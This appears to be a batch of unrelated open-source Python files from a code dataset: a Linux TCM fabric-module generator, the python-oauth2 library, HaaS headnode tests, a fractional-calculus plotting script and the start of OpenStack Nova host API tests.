f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
|
gpl-2.0
|
bjacquemet/python-oauth2
|
oauth2/__init__.py
|
458
|
29044
|
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
Raise TypeError if x is a str or if x is an iterable which
contains a str.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
user. It's kind of the OAuth client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
def setter(attr):
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
for k, v in self.items():
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
for key, value in self.iteritems():
if key == 'oauth_signature':
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
# Encode signature parameters per Oauth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = parse_qs(body)
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise Error('Signature method %s not supported try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def sign(self, request, consumer, token):
"""Builds the base signature string."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
|
mit
|
henn/haas
|
tests/deployment/headnodes.py
|
2
|
2516
|
# Copyright 2013-2015 Massachusetts Open Cloud Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS
# IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""Unit tests for headnodes.
These require an actual libvirt daemon (and full HaaS setup), and are
somewhat particular to the MOC's development environment. They may be
difficult to run in other contexts.
"""
from haas.test_common import *
from haas.dev_support import have_dry_run
from haas import config, server, rest
import pytest
@pytest.fixture
def configure():
config_testsuite()
config.load_extensions()
fresh_database = pytest.fixture(fresh_database)
@pytest.fixture
def server_init():
server.register_drivers()
server.validate_state()
with_request_context = pytest.yield_fixture(with_request_context)
headnode_cleanup = pytest.fixture(headnode_cleanup)
pytestmark = pytest.mark.usefixtures('configure',
'server_init',
'fresh_database',
'with_request_context',
'headnode_cleanup')
class TestHeadNode:
def test_headnode(self):
api.project_create('anvil-nextgen')
network_create_simple('spider-web', 'anvil-nextgen')
api.headnode_create('hn-0', 'anvil-nextgen', 'base-headnode')
api.headnode_create_hnic('hn-0', 'hnic-0')
api.headnode_connect_network('hn-0', 'hnic-0', 'spider-web')
if have_dry_run():
pytest.xfail("Running in dry-run mode; can't talk to libvirt.")
assert json.loads(api.show_headnode('hn-0'))['vncport'] is None
api.headnode_start('hn-0')
assert json.loads(api.show_headnode('hn-0'))['vncport'] is not None
api.headnode_stop('hn-0')
api.headnode_delete('hn-0')
def test_headnode_deletion_while_running(self):
api.project_create('anvil-nextgen')
api.headnode_create('hn-0', 'anvil-nextgen', 'base-headnode-2')
api.headnode_start('hn-0')
api.headnode_delete('hn-0')
|
apache-2.0
|
lsiemens/lsiemens.github.io
|
theory/fractional_calculus/code/old/FCC2.py
|
1
|
1663
|
"""
Ideas about fractional calculus defined on C^2
J^b f(x, a) = f(x, a + b)
"""
import numpy
from matplotlib import pyplot
from scipy import special
def monomial(x, a, x_0, a_0):
return (x - x_0)**(a - a_0)/special.gamma(a - a_0 + 1)
def exp(x, a, b):
return b**(-a)*numpy.exp(b*x)
def projx(f, x, a):
n = numpy.searchsorted(numpy.real(a), 0.0)
pyplot.plot(x, f[-n, :])
pyplot.show()
def proja(f, x, a):
n = numpy.searchsorted(numpy.real(x), 0.0)
pyplot.plot(a, f[:, -n])
pyplot.show()
def plotR(f, vmin=-10, vmax=10):
_plot_C3(numpy.real(f), vmin=vmin, vmax=vmax)
def plotI(f, vmin=-10, vmax=10):
_plot_C3(numpy.imag(f), vmin=vmin, vmax=vmax)
def plotM(f, vmax=10):
_plot_C3(numpy.abs(f), vmax=vmax)
def plotMl(f):
_plot_C3(numpy.log(numpy.abs(f)))
def _plot_C3(f, vmin=None, vmax=None):
pyplot.imshow(f, extent = [x_0, x_1, a_0, a_1], vmin=vmin, vmax=vmax)
pyplot.show()
x_0, x_1, Nx = -5, 5, 1000
a_0, a_1, Na = -5, 5, 1000
X = numpy.linspace(x_0, x_1, Nx, dtype=numpy.complex)
dx = (x_1 - x_0)/(Nx - 1)
da = (a_1 - a_0)/(Na - 1)
A = numpy.linspace(a_0, a_1, Na, dtype=numpy.complex)
domain_x, domain_a = numpy.meshgrid(X, A[::-1])
F = monomial(domain_x, domain_a, 0, -1)
G = monomial(domain_x, domain_a, 1, -1) + monomial(domain_x, domain_a, 1, 0)
G = -monomial(domain_x, domain_a, 1, -1) + 0.5*monomial(domain_x, domain_a, 0, -3)
G = (exp(domain_x, domain_a, 1.0j) + exp(domain_x, domain_a, -1.0j))/2.0
#G = (exp(domain_x, domain_a, 2.0j) - exp(domain_x, domain_a, -2.0j))/2.0
#G = F
Gp = numpy.gradient(G)
#G = Gp[1]
projx(G, X, A)
proja(G, X, A)
plotR(G)
plotI(G)
plotM(G)
plotMl(G)
|
mit
|
fajoy/nova
|
nova/tests/api/openstack/compute/contrib/test_hosts.py
|
1
|
14601
|
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import webob.exc
from nova.api.openstack.compute.contrib import hosts as os_hosts
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import db
from nova.openstack.common import log as logging
from nova import test
LOG = logging.getLogger(__name__)
HOST_LIST = {"hosts": [
{"host_name": "host_c1", "service": "compute", "zone": "nova"},
{"host_name": "host_c2", "service": "compute", "zone": "nova"}]
}
HOST_LIST_NOVA_ZONE = [
{"host_name": "host_c1", "service": "compute", "zone": "nova"},
{"host_name": "host_c2", "service": "compute", "zone": "nova"}]
SERVICES_LIST = [
{"host": "host_c1", "topic": "compute"},
{"host": "host_c2", "topic": "compute"}]
def stub_service_get_all(self, req):
return SERVICES_LIST
def stub_set_host_enabled(context, host, enabled):
if host == "notimplemented":
raise NotImplementedError()
# We'll simulate success and failure by assuming
# that 'host_c1' always succeeds, and 'host_c2'
# always fails
fail = (host == "host_c2")
status = "enabled" if (enabled != fail) else "disabled"
return status
def stub_set_host_maintenance(context, host, mode):
if host == "notimplemented":
raise NotImplementedError()
# We'll simulate success and failure by assuming
# that 'host_c1' always succeeds, and 'host_c2'
# always fails
fail = (host == "host_c2")
maintenance = "on_maintenance" if (mode != fail) else "off_maintenance"
return maintenance
def stub_host_power_action(context, host, action):
if host == "notimplemented":
raise NotImplementedError()
return action
def _create_instance(**kwargs):
"""Create a test instance"""
ctxt = context.get_admin_context()
return db.instance_create(ctxt, _create_instance_dict(**kwargs))
def _create_instance_dict(**kwargs):
"""Create a dictionary for a test instance"""
inst = {}
inst['image_ref'] = 'cedef40a-ed67-4d10-800e-17455edce175'
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = kwargs.get('user_id', 'admin')
inst['project_id'] = kwargs.get('project_id', 'fake')
inst['instance_type_id'] = '1'
if 'host' in kwargs:
inst['host'] = kwargs.get('host')
inst['vcpus'] = kwargs.get('vcpus', 1)
inst['memory_mb'] = kwargs.get('memory_mb', 20)
inst['root_gb'] = kwargs.get('root_gb', 30)
inst['ephemeral_gb'] = kwargs.get('ephemeral_gb', 30)
inst['vm_state'] = kwargs.get('vm_state', vm_states.ACTIVE)
inst['power_state'] = kwargs.get('power_state', power_state.RUNNING)
inst['task_state'] = kwargs.get('task_state', None)
inst['availability_zone'] = kwargs.get('availability_zone', None)
inst['ami_launch_index'] = 0
inst['launched_on'] = kwargs.get('launched_on', 'dummy')
return inst
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
GET = {}
